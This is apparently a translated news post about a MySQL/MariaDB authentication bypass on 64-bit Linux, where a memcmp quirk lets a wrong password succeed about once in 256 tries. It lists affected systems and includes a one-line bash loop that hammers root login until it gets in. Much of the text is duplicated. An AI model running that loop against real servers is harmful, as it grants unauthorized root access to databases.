Funny vulnerability in MySQL under Linux 64-bit
On Saturday, MariaDB security coordinator for the MariaDB project ( petropavel ) reported an interesting vulnerability in MySQL / MariaDB to versions 5.1.61, 5.2.11, 5.3.5, 5.5.22.
The bottom line is that when you connect a user MariaDB / MySQL, a token is calculated (SHA from password and hash), which is compared with the expected value. At the same time, the memcmp () function should return a value in the range -128..127, but on some platforms (it seems, in glibc on Linux with optimization for SSE), the return value may fall out of range.
As a result, in 1 case out of 256, the procedure of comparing the hash with the expected value always returns true, regardless of the hash. In other words, the system is vulnerable to a random password with a probability of 1/256.
As a result, a simple bash command gives the attacker root access to the vulnerable MySQL server, even if he does not know the password.
')
At the moment, the presence of the vulnerability is confirmed informally in the following configurations:
Ubuntu Linux 64-bit (10.04; 10.10; 11.04; 11.10; 12.04)
Debian Linux 64-bit (it is not yet clear in which specific versions)
Arch Linux (same)
Fedora 16 (64-bit)
Users also report configurations in which the vulnerability does not seem to be observed:
Official MySQL and MariaDB builds (including Windows)
Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably everything)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0 + squeeze1
Debian Linux squeeze 64-bit 5.1.61-0 + squeeze1
There is no exact list of vulnerable and invulnerable systems.
Joshua Drake from Accuvant Labs has published a vulnerability testing program .
The bottom line is that when you connect a user MariaDB / MySQL, a token is calculated (SHA from password and hash), which is compared with the expected value. At the same time, the memcmp () function should return a value in the range -128..127, but on some platforms (it seems, in glibc on Linux with optimization for SSE), the return value may fall out of range.
As a result, in 1 case out of 256, the procedure of comparing the hash with the expected value always returns true, regardless of the hash. In other words, the system is vulnerable to a random password with a probability of 1/256.
As a result, a simple bash command gives the attacker root access to the vulnerable MySQL server, even if he does not know the password.
')
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done mysql> At the moment, the presence of the vulnerability is confirmed informally in the following configurations:
Ubuntu Linux 64-bit (10.04; 10.10; 11.04; 11.10; 12.04)
Debian Linux 64-bit (it is not yet clear in which specific versions)
Arch Linux (same)
Fedora 16 (64-bit)
Users also report configurations in which the vulnerability does not seem to be observed:
Official MySQL and MariaDB builds (including Windows)
Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably everything)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.0.51a-24 + lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0 + squeeze1
Debian Linux squeeze 64-bit 5.1.61-0 + squeeze1
There is no exact list of vulnerable and invulnerable systems.
Joshua Drake from Accuvant Labs has published a vulnerability testing program .
Source: https://habr.com/ru/post/145641/
All Articles